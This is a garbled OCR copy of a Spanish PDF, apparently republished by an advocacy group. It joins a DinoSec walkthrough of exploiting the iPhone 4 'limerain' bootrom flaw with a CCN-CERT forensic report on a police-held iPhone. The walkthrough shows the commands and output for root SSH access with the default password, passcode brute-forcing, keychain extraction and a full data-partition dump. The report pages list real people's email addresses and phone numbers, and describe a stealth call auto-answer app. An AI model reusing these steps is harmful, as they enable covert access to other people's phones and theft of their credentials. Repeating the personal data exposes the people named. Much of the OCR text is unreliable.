PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4

5.

Proceso de explotación de la vulnerabilidad

Los siguientes pasos

detallan el proceso

a

seguir para explotar la vulnerabilidad 'limerain' en un

dispositivo móvil iOS objetivo, en este caso, un iPhone 4. En concreto, se hará uso de la vulnerabilidad 'limerain' para arrancar el dispositivo móvil desde una versión personalizada del sistema operativo iOS (creada durante el proceso de preparación previo) y que dispone de capacidades para obtener acceso completo al dispositivo mediante un shell (o línea de comandos), así como poder realizar

ataques de fuerza bruta sobre el código del acceso del dispositivo móvil. Una vez obtenido el código de acceso, es posible descifrar el Keychain, qué proporciona acceso a todas las credenciales (usuarios y contraseñas) y certificados del usuario, así como el contenido completo de la memoria del dispositivo móvil y acceder a la totalidad del sistema de archivos (incluyendo todos los ficheros y directorios). Estos pasos deben ser repetidos para cada dispositivo móvil objetivo específico que se desea explotar.

5.1

ExplotacIón de la vulnerabilidad

detallan como explotar la vulnerabilidad 'limerain' y hacer uso de iPhone Data Protection Tools para disponer de capacidades de ejecución en el dispositivo móvil objetivo.

Los siguientes pasos

51.1

Conexión del dispositivo móvil al ordenador

debe conectar el dispositivo móvil objetivo al ordenador mediante un cable USB, en concreto, el cable USB de Apple de 30 pines para el iPhone 4. En el caso de que iTunes detecte la presencia dei

Se

dispositivo móvil y arranque, debe permitirse su ejecución.

Una vez ha finalizado el proceso de arranque, tanto del dispositivo móvil (en caso de estar previamente apagado y haber arrancado al ser conectado al ordenador) como de iTunes (en caso de ejecutarse automáticamente al detectar el dispositivo), debe procederse a apagar el dispositivo móvil mediante el botón de encendido y apagado, siguiendo el método habitual, y cerrar iTunes. Una vez el dispositivo móvil se ha apagado completamente, se puede proceder al siguiente paso.

Al final de la ejecución del script "build.py", detallada en el apartado de preparación previo, se llevó

cabo la ejecución automática del script "boot.py", que

a su

a

vez ejecutó la herramienta redsnOw. En

este punto se debe hacer uso de dicha herramienta.

querer explotar la vulnerabilidad directamente en ocasiones posteriores, de nuevo directamente el script "boot.py" contra el dispositivo móvil iOS objetivo: En caso de

se

puede ejecutar

s cd $HONE/iDPT/iphone-dataprotection s ./boot.py

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

Page 23

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

Análisis técnico de

Ia

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

vulnerabilidad 'limera in' en el iPhone 4

primer lugar es necesario arrancar el dispositivo móvil objetivo en modo DFU (Device Firmware Update), mediante un proceso de arranque personalizado que permite restaurar los dispositivos móviles de Apple31. Puede Ilevarse a cabo el proceso manual descrito a continuación, o seguir las instrucciones del mismo desde la ventana de redsnOw tras pulsar el botón "Next>": En

e

redsnOwO915b3

Please use the foItoIng ,nstructons to nter

I.

Ho4d down th. Power

con.) button

for I

<Back

DFU mod.

second.

.

Quit

i.

Asegurarse de que el dispositivo móvil está conectado al ordenador mediante un cable USB.

2.

Apagar el dispositivo móvil.

3.

Esperar a que el dispositivo móvil se apague completamente. Arrancar el dispositivo móvil manteniendo pulsado el botón de arranque (o botón de encendido V apagado) durante 3 segundos.

4.

5.

Pulsar el botón de arranque y de "Home" simultáneamente durante 10 segundos.

6.

Soltar el botón de arranque pero mantener pulsado el botón de "Home". Después de unos i5 segundos, redsnOw detectará que el dispositivo está en modo recuperación

7.

e

La

31

intentará ejecutar el exploit de 'limerain' automáticamente.

pantalla del dispositivo permanecerá en blanco (de color negro), sin ningún logotipo o imagen.

https://www.theiphonewiki.com/wiki/DFU_Mode

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

Page 25

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

--.------

Anáflsis técnico de la vunerabiIidad hrneraln en & iPhone 4

fnalice & proceso de explotación, redsnüw Jo indicará con & mensaje Done'. momento es posibe cerrar redsnüw medante & botón Quit:

Una vez

En caso de

tener éxito & expoit,

se visualizará una piña en la pantafla del

En ese

dispositivo móvfl durante el

proceso de arranque (en lugar de el logo de la manzana de Apple), seguida de mensajes de texto asociados al arranque personalizado a través de las Phone Data Protection Tools:

-

-

-

© 2016 DinoSec (www.dinoseccom)

Dr. (PhD) Ing. Miguel Gallardo

perito judicial investigador

Page 27

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4

primer lugar se debe ejecutar en un terminal el script "tcprelay.sh", incluido en las iPhone pata Protection Tools:

En

sh tcprelay.sh Forwarding local port 2222 to remote port 22 s

A continuación, es posible establecer una conexión con el dispositivo móvil mediante un cliente SSH

desde otro terminal

a

través de la redirección local, empleando el usuario root y la contraseña por

defecto, "alpine": s ssh -p 2222 root@localhost can't be [localhost] :2222 ([127.0.0.1] :2222) The authenticity of host established. RSA key fingerprint is 76:79:9c:19:77:c3:53:90:20:4f:a7:55:54:87:bl:fb. Are you sure you want to continue connecting (yes/no)? yes [localhost] :2222' (RSA) to the list of known Warning: Permanently added '

'

'

hosts. root@localhost' -sh-4

s

password:

.

Como resultado, se dispone de acceso con el usuario que dispone dei máximo nivel de privilegios en el dispositivo móvil, root, pudiendo ejecutar cualquier comando en ei mismo.

Incluso sin disponer del código de acceso, es posible montar los sistemas de ficheros del dispositivo móvil asociadas a las dos particiones existentes, la de sistema (donde reside el sistema operativo lOS) V la

de usuario (donde residen todos los datos asociados al usuario y apps):

-sh-4.O# ls -1 total 284 -rwxr-xr-x 1 mobile 20 106656 Feb 14 12:45 bruteforce -rwxr-xr-x 1 mobile 20 105776 Feb 14 12 45 device infos -rwxr-xr-x 1 mobile 20 66896 Feb 14 12:45 ioflashstoragekit 514 Feb 14 12:45 mount partitions.sh -rwxr-xr-x 1 mobile 20 -sh-4.O# pwd /var/ root -sh-4.O# mount /dev/mdü on / (hfs, local, noatime) devfs on /dev (devfs, local, nobrowse) -sh-4 O# /mountpartitions sh -sh-4.O# mount /dev/rndO on I (hfs, local, noatime) devfs on ¡dey (devfs, local, nobrowse) /dev/diskOslsl on /mntl (hfs, local, journaled, noatime) /dev/diskOsls2 on /mnt2 (hfs, local, journaled, noatime, protect) -sh-4 O# -sh-4.O# cd /inntl -sh-4.O# is -i :

.

.

.

.

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

perito judicial investigador

Page 29

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 1imeraln' en el iPhone 4

python python_scripts/demo_bruteforce py 047ed583c983d0f4c1497b2cf79d7289502c014d Connecting to device 08cb4a03cd7f43f89fdc32626f6fde89 Keybag UUID Enter passcode or leave blank for bruteforce: s

.

:

:

Trying all 4-digits passcodes...

lo

of 10000 ETA: of 10000 ETA:

0:31:40

20

of 10000 ETA:

0:31:26

30 of 10000

ETA:

0:31:13

40 of 10000

ETA:

0:31:01

o

1220 of 10000 ETA:

0:26:17

1230 of 10000 ETA:

0:26:15

10000 of 10000 Time: 1

00

%

0:03:42

i

0:03:42.064051 'passcodeKey': f3baO4004lab2bec36cdfad7daeSd96l45aO4200d62elac37l3d2ab5ldaa8def' True System keybag (0) Keybag type 4 Keybag version 08cb4a03cd7f43f89fdc32626f6fde89 Keybag UUID

BruteforceSystemKeyBag {'passcode':

:

'1234',

!

}

:

:

:

WRAP Type

Class

.

kSeaAt Irkacassa blepheslalacked kaeaaktraaaessa bCoafteryars 105151k kIecAl trkceesea bleblsays kSeaAC trkccessa blepaealalaakedlhls lavicoOs ay kIecAt Crkcaessa bleAT terFiretlallckThis 11511005 by kIelAt trkaleasa bleAlwayslhislevicelnly

Ala ala All bEI AIS ASS

3 3 1 3 3 i

Downloaded keychain database, secrets

3

Public key

Key

3 Ala NSFaleyra Coalisa lampade 3 Curve2Slll NSFiJepro teChos CompleteUalessOyek cd2adfl533ela2la767Seeg97clklkbek3afbkdeflbk62edllS59bdO4Ofk44lB TIES NaFijepro tection Completeziatil First UserAk'thenticatioa 3 bES 3 NaFlleyateatiaa bocavory'

0812f8fa86d8a5ed9a8286a0b0a76444e2499kef3f9501c80374d13a1138coo5 a2613daba07825613ef9bdb9f7b903b85kk9ac9523k4f11417a82668d48k8da6

asabaaealc4e55eelralaf6d5l9db2O5245e64522ld7a8l83b64e5a47ldeb 85f16352b6a3a8249968e82e8b49bl97a7e67a5f294l700167b3a00faeaa13a5 a1ba9516341f8aaa20a9a2904aeba5f93058aek121c74a2b5342U743501a11c5 ba24a9e6ec14397b79aa5339791116e395a1a461e28f9fb72fa00b9394201519 O292abOdfafBblfSlf2bbllkbl7ae24cllblllöbkeelsSaaldG200b7f59ebbC2 b5elsdlfbf7el2llo5b6bcc2S62olldll3eblb545el4eelb7a4del2ll4SdTO24 l63d2f8585lea0fl481432l7lbld5a7d84ba5fk765499lkf3o3bTa463oa0lb47 bdl5eeal9keb3laeleEc27bfc2ealb4lbla2Sb4ealSlSd785a15aa42a27ae15c

files,

use keychaintool.py to decrypt

s s

ls

-1 047ed583c983d0f4c1497b2cf79d7289502c014d/

total 5224 -rw-r--r--rw-r--r--rw-r--r--rw-r--r--

1 1 1 1

usuario usuario usuario usuario

staff staff staff staff

10606 4096 32768 2624472

15 feb 19:57 55ee31f5bf824443.plist 15 feb 19:57 keychain-2.db 15 15

feb 19:57 keychain-2.db-shm feb 19:57 keychain-2.db-wal

s

Debido

a la

implementación de los mecanismos de cifrado existentes en los dispositivos móviles lOS,

dependientes de claves de cifrado almacenadas únicamente en el hardware de cada dispositivo,

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

perito judicial investigador

la

Page 31

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

s

Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4

NOTA: Los ejemplos superiores no muestran información crítica o sensible dei usuario ya que,

a

propósito, el dispositivo móvil objetivo empleado había sido instalado recientemente y no disponía de datos de usuario relevantes. :

obtenido previamente, sería potencialmente posible alterar los diferentes componentes implicados en el arranque del dispositivo móvil lOS, como el LLB, iBoot y/o el kernel, de manera similar al proceso de jailbreak, para disponer permanentemente de las capacidades para instalar y/o ejecutar cualquier software en el dispositivo objetivo. Con el nivel de acceso

Con la información previa dei Keychain, es posible descifrar el contenido completo de la memoria del

dispositivo móvil y acceder a la totalidad dei sistema de archivos (incluyendo todos los ficheros y directorios), y a sus contenidos. siguiente secuencia de comandos y scripts permiten volcar

partición de datos (o de usuario, no así la de sistema ya que únicamente contiene la versión de iOS utilizada)32, a través de la conexión de TCP relay de SSH (siendo necesario introducir la contraseña de root en un par de ocasiones), al ordenador local y en concreto bajo el directorio de trabajo asociado al UDID del dispositivo móvil La

la

objetivo. Este proceso llevará bastantes minutos, dependiendo dei tamaño de dispositivo móvil objetivo, y en concreto, del tamaño de la partición de datos:

memoria del

la

sh tcprelay.sh Forwarding local port 2222 to remote port 22

s

/dump_datayartition sh s Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts. root@localhost s password: 047ed583c983d0f4cl497b2cf79d7289502c0l4d Device UDID Dumping data partition in .

.

'

:

047ed583c983d0f4c1497b2cf79d7289502c0l4d/data2Ol6O2l5-2043.dmg [localhost] :2222' (RSA) to the list of known Warning: Permanently added .

.

'

hosts.

root@localhost's password: dd: opening /dev/rdiskOs2sl': No such file or directory Connection to localhost closed by remote host. s

NOTA: Los errores anteriores son habituales y no interfieren con la adquisición de la partición.

Como resultado se creará un fichero .dmg con la fecha y hora actuales, que corresponde

a la

imagen

de la partición de datos (de 13,50 GB de tamaño para un iPhone 4 de 16 GB; el resto dei espacio

32

En este caso sí se

recomienda usar el nand-disable boot flag en el script boot.py.

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

perito judicial investigador

Page 33

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

4I-

DIFUSIÓN LIMITADA 4

.

I

CCN-CERT

II-11/16

Teléfono ¡Phone 4

Cuerpo Nacional de

Policia

Marzo de 2016

DIFUSIÓN LIMITADA Dr. (PhD) Ing. Miguel Gallardo

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

CCNCERT

IT

www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA

PUBLICADO en www.cita.es/cni-iphone.pdf

11/16

LIMITACIÓN DE RESPONSABILIDAD Ei presente documento se proporciona de

acuerdo con los términos en él recogidos, rechazando expresamente cualquier tipo de garantía implícita que se pueda encont'rar" relacionada. En ningún caso, el Centro Criptológico Nacional puede ser considerado responsable del daño directo, indirecto, fortuito o extraordinario derivado de la utilización de la información y software que se indican incluso cuando se advierta de tal posibilidad. AVISO LEGAL

Quedan rigurosamente prohibidas, sin la autorización escrita del Centro Criptológico Nacional, bajo las sanciones establecidas en as leyes, la reproducción parcial o total de este documento por cualquier medio o procedimiento, comprendidos la reprografla y el tratamiento informático, y la distribución de ejemplares del mismo mediante alquiler o préstamo públicos.

------

Dr. (PhD) Ing. Miguel Gallardo

----------

DIFUSIÓN LIMITADA perito judicial investigador

---------

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

CCNCERT

1.

IT

www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA

PUBLICADO en www.cita.es/cni-iphone.pdf

Teléfono Móvil iPhone 4

11/16

SOBRE CCN-CERT EI

CCN-CERT (www.ccn-cert.cni.es) es la

Capacidad de Respuesta a incidentes

de Seguridad de la Información dei Centro Criptológico Nacional, CCN. Este servicio se creó en ei año 2006 como CERI Gubernamental Nacional español y sus funciones quedan recogidas en la Ley i 1/2002 reguladora dei Centro Nacional de inteligencia. el RD 421/2004 de regulación del CCN y en ei RD 3/2010, de 8 de enero, regulador dei Esquema Nacional de Seguridad, modificado por el RD 951/2015, de 23 de octubre. De acuerdo a todas ellas, ei CCN-CERT tiene responsabiiidad en ciberataques sobre sistemas clasificados y sobre sistemas de las Administraciones Públicas y de empresas y organizaciones de interés estratégico para el país. Su misión, por tanto, es contribuir a la mejora de la ciberseguridad españoia, siendo el centro de aierta y respuesta nacional que coopere y ayude a responder de forma rápida y eficiente a ios ciberataques y a afrontar de forma activa ias ciberamenazas.

Dr. (PhD) Ing. Miguel Gallardo

DIFUSIÓN LIMITADA perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


_

Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA

Teléfono Móvil iPhone 4

CCN.CERT IT- 11/16

Í344S

nrbr

S1

PUBLICADO en www.cita.es/cni-iphone.pdf

»

J[

ct

CPy

(O ìWflcr

c

çrerttt

ApeW

33i? 34:E;3723

lSPd

<MY

1M!

Icou Wi h

z:z3F

MA

S!Jbkd

toc

c-rsr

ad

up

tV'k Apple

U's

W

USdK

NNWbt

UWUM4C

Tfl

>1iør4

thb

cwm WO

tACakniT

:

Figura 4-1. Detalles de la primera extracción

5. EVIDENCIAS

FORENSES

Se dispone de dos extracciones forenses realizadas sobre el mismo teléfono pero realizadas en distintos días. Los datos de las extracciones disponibles son los siguientes: (NP iPhone4GSM_7.1-7.1.2_Physical_17-12-14_11-05-32.img A7E253E4004BD41090885D26F96D4E7E8A42E5D3270A1F3675FFA60851360620 15 955 189.760 17/12/ - 2014 11:24:53 (UTC-i-1) Phone4GSM_7.1-7.1.2_Physical_17-12-14_11-05-32.UFD

NombreArchvo FirmaSHA»256 Tamaño (bytes)

Fechatreacíón Nombre ArchivoFirmaSHA-25& Tamaño (bytes} Eechacreacián

-

DFFEB83E1EE7D12BF1114BBF4B9EE6D1BOF7EF128725938BO3724926DDF83CAO 2 608

17/12/-2014 11:24:54 (UTC+1)

Exòd12 Fechaireacián Nombre Archivo

aIzaç por CCN iPhone4GSM_7.1-7.1.2_Physical_29-07-15_13-26-54.img 2260D0795551ED5EB6831E7057633FB1FE8C81731A8AE80367CB1C79000D1FD6 15 955 189.760 29/07/2015 - 13:26:55 (UTC+1) iPhone4G5M_7.1-7.1.2_Physical_29-07-15_13-26-54.UFD

Nombre Archivo RrmaSHA»256 Tamaflo (bytes}

firma SHA-256

OA969ADEB4F0002B3135DA2ADEOBOAAEF6O9CCDA6EA1198F158F1CB7A44F68E7

Tamatio (bys)

1

Iecha creación

29/07/2015 - 13:26:55 (UTC+1)

933

extracciones en distintas fechas y al no haber estado detenido el teléfono móvil, las extracciones presentan diversas diferencias motivadas a la actividad realizada por el usuario con el teléfono y a la interacción del teléfono móvil con las aplicaciones instaladas e Internet. Al realizarse las

Una de las diferencias existentes, es el número de cuentas asociadas a los servicios de Apple. Estas cuentas permiten, entre otras funciones, bajarse e instalar aplicaciones en el móvil, resolver incidencias, etc. En

la primera extracción (del 17/12/14) se han encontrando los siguientes "Apple

ID":

.

"

s

"

Dr. (PhD) Ing. Miguel Gallardo

rocioperezlorente@yahoo.es u telecomunicaciones.fax@gmail.com

I'

LIMITADA DIFUSIÓN perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

ccrcE:T

www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA T&éfono

T

11/16

.

http://www.dinosec.com/docs/Android-

PUBLICADO en www.cita.es/cni-iphone.pdf

i

óvil

¡Phone 4

F

Back_to_fhe_Future_Too_Roofed2O i 5_RauISiIes-DinoSec_v i .O.pdf

.

http://www.youtube.com/watch?v=cEKu8Cwl Dyo

Adicionalmente, el dispositivo objeto dei informe presenta diversas vulnerabilidades CRÍTICAS, presentes en ei núcleo o SoC (System on Chip) modelo A4 que posee ei terminai, permitiendo ei control total dei teléfono, como por ejemplo las vulnerabilidades "limerai n' o Shatter" (https://www.theiphonewiki.com/wiki/SSL8930).

-

Figura 6-2. System on Chip A4 del ¡Phone 4

vulnerabilidades que afectan al hardware dei dispositivo SOLO se pueden evitar/solucionar SUSTITUYENDO ei dispositivo por un modelo más nuevo basado en otra versión de SoC no vulnerable. Estas

Adjunto al informe se presenta el documento "Análsis técnico de la vulnerabilidad "limera i n" en el iPhone 4" elaborado por el consultor de seguridad Raúl Siles de la empresa Dinosec, donde se recoge paso a paso cómo explotar la vulnerabilidad "limerain" y cómo instalar una aplicación que entre sus funcionalidades está la de responder de forma automática y sin la intervención dei usuario a algunas llamadas recibidas. Adicionalmente, la aplicación presenta un modo silencioso (Stealth Mode) para que ei teléfono no emita ningún sonido asociado a la llamada entrantre, de forma que el usuario no sea consciente de la misma, no mostrándose ni siquiera que hay una llamada activa y no dejando registro en ei histórico de llamadas recibidas. A

continuación se muestran diversas imágenes de la aplicación "Auto Answer".

Dr. (PhD) Ing. Miguel Gallardo

DIFUSIÓN LIMITADA perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

CCN-CERT

En

IT

www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA

TeIéfono Móvil ¡Phone 4

11/16

cambio en la segunda extracción (del 29/07/1 5) TaIeV

-

es el siguiente:

'

-

«l

-

-

-

,

fp!icV

j -

PUBLICADO en www.cita.es/cni-iphone.pdf

-

-

rn'2G14 1?3O:174UTC+O)

om

_-:-__

mmbcEae ---

:

Figura 7-2. Registro actividad día 20/10/2014 perteneciente a la segunda extracción

7.1 REGISTRO DE LLAMADAS

dispositivos iPhone solo almacenan las últimas 100 llamadas (recibidas, realizadas, fallidas y borradas por el usuario), por lo que NO existen registros de llamadas en los días 20 y 21 de octubre de 2014. Los

existen registros de llamadas anteriores a esa fecha, pero son llamadas registradas por la aplicación "FaceTime" que poseen los iPhone, la cual permite establecer llamadas sobre IP (canal de datos) de audio y voz con otro terminal iPhone. Sí

Cuando el registro de llamadas alcanza el número máximo (100), la llamada más antigua registrada es borrada de forma automática para incluir la nueva, por lo que el registro de llamadas puede solo contener uno o dos días en aquellos usuarios que tengan un elevado tráfico de llamadas (rebicidas, realizadas o perdidas). 7.2 TELÉFONO 652972428 Los únicos datos que aparecen en teléfono 652972428" son dos: s

las distintas

extracciones del número de

Mensaje SMS remitido por la operadora móvil indicando "Llamada Perdida", el pasado día 7 de noviembre de 2014, como se observa en la siguiente imagen: prom: .34653fl42& UAMADAS Pf.fti DAS

St G1!2O14

-

-

O;4tUC+OWoId

Ex

Prties5Z3724 0041y

5Z9724Z8

--

-:chh UAMADA$ PEOA.

-

Figura 7-3. Registro existente dei teléfono 652972428

rn-__________

Dr. (PhD) Ing. Miguel Gallardo

LIMITADA DIFUSIÓN perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA

PUBLICADO en www.cita.es/cni-iphone.pdf

CCNCERTIT11/16 teléfono, supuestamente, se encuentra encendido de manera ininterrumpida desde el día 30 de septiembre de 2014.

2014.

El

7.5 REDES WIFI A continuación se muestra la relación de puntos de acceso a los que se ha conectado el terminal, algunos de ellos son puntos de acceso NO controlados por

personal de la Organización.

5fuhZCZ4

7î'2O43G32WTC.O}

3(UTC*O1

ii33(UTCJ

I28/C9/2O$

V/OV2U4 1:37.52flJTCß

L

26fO9J2O4 17;1t1IUÍC.O

12?f9?2O4 144249LUÎC'.

I2o14 1754UTC-QJ

J251W2O14 18O3 4(lJTC.

jECDOCiC:EO 15E:31CI

I25J9/2OA 782i[UTC*G)

j2AA4 3C:O323

342UTC-O)

J2DI4 763JTc-O:

22ÌO9!2O14 I355tUTCO)

12í2Q4 1144 3UTC.O3 ]1/9Í2Q '2O14 II243(U1C.D)

fr-

CD144AD

2VO/Oi4 17372(UTCO

jfç4

_5DF

1A28AV-CC

jHOTSPOT.SAP orr

1aiaVed&WiF

1I2DFOOc

"-° I°°'

4OfUTCQ)

I1711{JTC3

1JW2i4 13146(UTCQJ 1WW2014 11Q2(UTC

th Paem

1F3FA22 3

P°' [.rpn

D1195OOW

7)TTh

HmaflT

29110/2013 1i4 I4jUTC.Oj jwiwci3 O53AOLUTCß

j2!13 17:55S5(uTC. --

-)7W

2ViO2O13 23=54=24CUTCc

J9iO2O13 I6IEWTC.0)

722B7DE31

I

22i632(UTC.03

29r1O'2O

t

-

--

=

=

»1Qk367kD

ndw m

825O -

-

-- - -RU)CAOSALUCAS

-

Figura 7-6. Redes WiFI a las que se ha conectado el Terminal

Como se ha observado en la imagen, la última red WiFi a la que se ha conectado el terminal para su acceso a redes públicas/privadas ha sido una red con el nombre SSId "WLAN_59DF".

8. TRÁFICO

DE DATOS

En el teléfono solo existen datos registrados por aquellas aplicaciones que se encuentran instaladas y que por su operatividad diaria pueden guardar datos de utilización, entre ellas se encuentran, el cliente de correo electrónico, el navegador empleado (Safari) y los programas de mensajería/chat (Whatsapp).

han encontrado el siguiente tráfico de datos correspondiente a visita de páginas web, envío de SMS o envío de correo electrónico siguientes: Se

Día

- HORA (uTc+o)

20/10/2014

- 17:30:17

20/10/2014

- 21:33:21

21/10/2014-08:03:55 21/10/2014 10:32:24

-

21/10/2014 - 14:05:06 21/10/2014 - 13:51:07

Dr. (PhD) Ing. Miguel Gallardo

Tipo de tráfico Correo electrónico de para info@casassg.com Correo electrónico de deltoroalinfinito@gmail.com para mmartin@policia.es SMS BBVA Móvil Correo electrónico de ¡lfruiz@policia.es para mmartin@policia.es 5M5 Llamada perdida al n2 659967760 Visita página Web de 2ominutos.es

nicia.es

DIFUSIÓN LIMITADA perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA

PUBLICADO en www.cita.es/cni-iphone.pdf I

CCNCERT

IT

Teéfono Móvil iPhone 4

11/16

4

com.indra.md. Por la información residual, el dispositivo se ha identificado como cliente con archivo número "W6BZ4M63461 I', según indica el "/Data/mobile/Applications/CAEA91 69-AF2A-4ODB-BC79-F2A8583E345C/Mobiledesk MDM.app".

Supuestamente, el último intento de conexión se realizó el pasado día noviembre de 2013 a las 15:16:10 (UTC+O).

12

de

Se ha observado que la aplicación actualizó sus datos el pasado día 6 de julio de 2013 a las 07:58:36 (UTC+O), desde entonces, no se ha observado actividad relevante.

9.2 COMSec La

aplicación "COMSec" permite comunicaciones seguras entre aquellos

dispositivos que posean la misma aplicación.

archivo información residual encontrada en el /Data/mobile/Applications/A5B88281 -1 C6A-4EBE-AC26EBEFC969OFOB/Documents/logfile.txt" indica que, supuestamente, el último intento de conexión se realizó el pasado día 26 de diciembre de 2013 a las 18:14:11 (UTC+O). La

lo.

BORRADO DE APLICACIONES

Existen distintos métodos para eliminar del terminal aplicaciones o incluso archivos, como por ejemplo:

Desde el icono mostrado en el terminal y seleccionando la opción "desinstalar" . s

s

Desde un equipo con ¡Tunes y conectado el móvil a través del cable

USB.

Instalando aplicaciones "válidas" cuya función sea el borrado de información o la liberación de espacio, como por ejemplo "PhoneExpander" y "PhoneClean".

Iniciando el móvil con alguno de los modos especiales e instalando cualquier aplicación cuya función sea la de borrado, como por ejemplo "iCleaner".

Independientemente del método o aplicación empleados, si se realiza con éxito, el sistema operativo generalmente no registra este tipo de acciones.

i i.

CONCLUSIONES La

evidencia forense indica que: s

teléfono móvil presenta vulnerabilidades críticas que pueden permitir el control total, tanto de forma local como remota, de TODAS las funcionalidades del mismo, pudiéndose realizar cualquier acción sobre el dispositivo como añadir aplicaciones, borrar archivos, borrar registros, etc. El

Dr. (PhD) Ing. Miguel Gallardo

LIMITADA DIFUSIÓN perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA

PUBLICADO en www.cita.es/cni-iphone.pdf

TeléfonoMóvilïPhone4

CCNCERTIT-11/16

aplicación "hunes", pudiendo no quedar información residual de acciones realizadas.

las

dispositivos móviles suelen tener una tarea programada que de forma automática gestiona el disco de estado solido que emplean para optimizar el rendimiento de sus terminales, por lo que la información borrada pasado un tiempo, suele ser destruida de forma automática. Los

12.

.

El

.

El

teléfono se ha conectado a puntos de acceso WIFI públicos que pueden incrementar el número de riesgos y amenazas. teléfono se ha actualizado o se ha vuelto a reinstalar la versión 7.1.2 (1 1D257) el pasado día 30 de septiembre de 2014.

Poc

puede ampliar cualquier punto del informe, utilizando como via preferente de comunicación el portal hfft://www.ccn-cert.cni.es Se

>

Teléfono: +34

>

E-Mail: ccn-cert@cni.es

91

372 59 74

Para comprender la importancia y trascendencia de este documento recomendamos leer http://www.cita.es/juzgado-iphone.pdf http://www.cita.es/habeas-smartphone.pdf y en inglés http://www.cita.es/fcc-complaint http://www.miguelgallardo.es/fcc-complaint.pdf En la asociación APEDANICA estamos a la disposición de todo el que pueda aportar documentos, testimonios y pericias contra el espionade de teléfonos móviles y también de antenas falsas IMSI-CHATHERS o STINGRAYS como las denunciadas en http://www.cita.es/querella-ai y http://www.miguelgallardo.es/querella-ai.pdf http://www.cita.es/ampliando-ai y http://www.miguelgallardo.es/ampliando-ai.pdf http://www.cita.es/reitera-ai y http://www.miguelgallardo.es/reitera-ai.pdf El Juzgado de Instrucción 2 de Madrid ha ignorado esos tres documentos, y también http://www.cita.es/juzgado-iphone.pdf por lo que han sido 4 los documentos ignorados. Nos remitimos a todos ellos y a http://www.miguelgallardo.es/ignorancia-deliberada.pdf ofreciendo nuestro teléfono (+34) 902998352 y el email: apedanica.ong@gmail.com

Dr. (PhD) Ing. Miguel Gallardo

DIFUSIÓN LIMITADA perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


